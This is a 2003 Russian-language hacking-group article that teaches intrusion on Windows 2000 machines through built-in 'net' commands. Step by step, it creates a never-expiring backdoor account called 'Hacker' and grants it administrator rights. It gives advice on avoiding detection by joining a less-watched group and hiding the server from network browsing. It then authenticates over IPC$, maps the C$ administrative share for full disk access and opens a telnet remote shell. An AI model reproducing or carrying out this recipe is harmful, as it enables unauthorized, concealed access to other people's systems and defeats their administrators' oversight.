======================================================================
# #
# Author: {dr}{nerve} // k0dsweb gr0up #
# Статья является собственностью команды KODSWEB #
# Любое растпространение без нашего ведома строго запрещено. #
# -= 2.03.2003 =- #
# #
======================================================================
# #
# Примеры использования сетевой среды W2k #
# #
======================================================================
В этой статье я хочу привести пример использования сетевой среды W2k, а имеено:
исследование удаленного компьютера, создание рабочего аккаунта с правами администратора,
использование сетевых дисков установленных по умолчанию и создание своих собственных,
удаление следов своего присутствия на удаленной машине.
Как известно, сетевая среда W2k поддерживает множество функций и параметров, на изучение
которых в полном объеме не всегда находится время. Поэтому в этой статье я попытаюсь
изложить наиболее используемые комады.
Полный список help руководства W2k консоли смотрите в статье "Сетевая среда W2k"
в архиве статей нашего сайта.
########################################################
====> Настройка консоли
########################################################
Прежде всего любителям все настраивать под себя будет полезна команда:
COLOR [цвета] - Установка цветов по умолчанию для текста и фона в текстовых окнах.
цвета Атрибуты цветов для текстовых окон
Атрибуты цветов задаются в виде ДВУХ шестнадцатеричных цифр -- первая
задает цвет фона, а вторая определяет цвет текста. Каждая цифра может
иметь следующие значения:
0 = Черный 8 = Серый
1 = Синий 9 = Светло-синий
2 = Зеленый A = Светло-зеленый
3 = Голубой B = Светло-голубой
4 = Красный C = Светло-красный
5 = Лиловый D = Светло-лиловый
6 = Желтый E = Светло-желтый
7 = Белый F = Ярко-белый
Пример: "COLOR fc" задает светло-красный текст на ярко-белом фоне
########################################################
====> Запуск
########################################################
net start "имя службы" - Запуск любой установленной службы по ее имени
net stop "имя службы" - Остановка службы
net help services - Выдаст список стндартных служб
net start workstation - Запуск службы "Рабочая станция" для работы
########################################################
====> Пользователи
########################################################
net user - Покажет список учетных записей пользователей на компьютере
net user /domain - Просмотр списка пользователей на сервере, в домен которого
входит исследуемый удаленный компьютер. Также покажет домен
и имя контроллера домена в данной подсетке.
net user Hacker Youpassword /add /expires:never /times:all
- Таким образом мы добавляем нового пользователя в систему
с логином Hacker и паролем Yourpassword.
/add - Указывает на добавление нового пользователя.
/expires:never - Устанавливаем дату истечения срока действия
учетной записи пользователя
на неограниченный срок (never).
/times:all - Устанавливаем промежуток времени, во время
которого пользователю разрешен
вход в систему. All - означает "всегда".
########################################################
====> Права доступа - Основа основ
########################################################
net localgroup - Просмотр списка групп на локальном компьютере
net localgroup Администраторы Hacker /add
- Добавляем себя в группу "Администраторы" :] на меньшее мы не согласны.
Здесь существует большая вероятность того, что вас просекут, если
вы работаете на удаленном компьютере, поэтому для "разработки" системы
можно добавить себя в другую группу с большим числом пользователей,
где добавление
нового пользователя скорее всего останется незаметным.
Хотя некоторые функции будут при этом недоступны. Но здесь
важно выиграть время.
На данном этапе исследования у нас имеется рабочий аккаунт на локальном / удаленном компьютере.
########################################################
====> Вход по аккаунту - Запуск сервера
########################################################
net start server - Для входа по только что созданному аккаунту необходимо запустить
сервер в теневом режиме.
net config server /hidden:yes
net stop server
net start server
Скрываем его из списка компьютеров в сети и перезапускаем сервер.
########################################################
====> Идентификация
########################################################
net use \\ip_addres\ipc$ Yourpassword /user:Hacker - Заходим на свой аккаунт
(Проходим идентификацию у контролера домена)
########################################################
====> Работа с сетевыми дисками
########################################################
net share - Просматриваем расшаренный ресурсы, выделенные в сеть на локальном компьютере.
net view \\ip_addres - Просматриваем список ресурсов на удаленной машине
W2k по умолчанию назначает выделенные ресурсы для каждого диска.
C$, D$,...
ADMIN$ - Каталог, в который установлен Windows
net use x: \\ip_address\c$ - Итак, если ресурсы по-умолчанию открыты и авторизация по вновь
созданному аккаунту X-администратора прошла успешно, то мы
можем подключить сетевой диск на полный доступ.
Далее можно делать с диском все, что угодно:
dir C: - Просмотр содержимого диска
...
Если дисков, выделенных по умолчанию нет, то их можно выделить самому:
net share С$=C:\
После использования бу-шный диск удаляется:
net share C$ /del
########################################################
====> Запуск W2k - Remote Shell
########################################################
net start telnet
telnet ip_address
Запускаем некое подобие shell'а на удаленной машине.
########################################################
====> ACL - таблицы управления доступом к файлам
########################################################
Просмотр и изменение таблиц управления доступом (ACL) к файлам
CACLS имяФайла [/T] [/E] [/C] [/G имя:доступ] [/R имя [...]]
[/P имя:доступ [...]] [/D имя [...]]
имяФайла Вывод таблиц управления доступом.
/T Замена таблиц управления доступом для указанных файлов
в текущем каталоге и всех подкаталогах.
/E Изменение таблицы управления доступом вместо ее замены.
/C Продолжение при ошибках отказа в доступе.
/G имя:доступ Определение разрешений для указанных пользователей.
"доступ": R Чтение
W Запись
C Изменение (запись)
F Полный доступ
/R имя Отзыв разрешений для пользователя (только вместе с /E).
/P имя:доступ Замена разрешений для указанного пользователя.
"доступ": N Отсутствует
R Чтение
W Запись
C Изменение (запись)
F Полный доступ
/D имя Запрет на доступ для указанного пользователя.
Для выбора нескольких файлов используются подстановочные знаки.
В команде можно указать несколько пользователей.
Например:
cacls C:\filename.txt /P Hacker:N
Таким образом мы сменили разрешение для указанного пользователя Hacker, а точнее
запретили ему иметь контакты с файлом filename.txt.
cacls C:\filename.txt /P Hacker:F
Данная команда вернет пользователя Hacker полные права на управление файлом.
########################################################
====> Подводим итоги
########################################################
W2k предоставляет большие возможности для работы с сетью, о чем не надо забывать,
отдавая приоритет при выборе той или иной операционной системы для
работы с сетью.
Все отзывы/предложения принимаются по адресу: admin@kodsweb.ru
[k0dsweb] kodsweb.ru
МАЗ-631705-222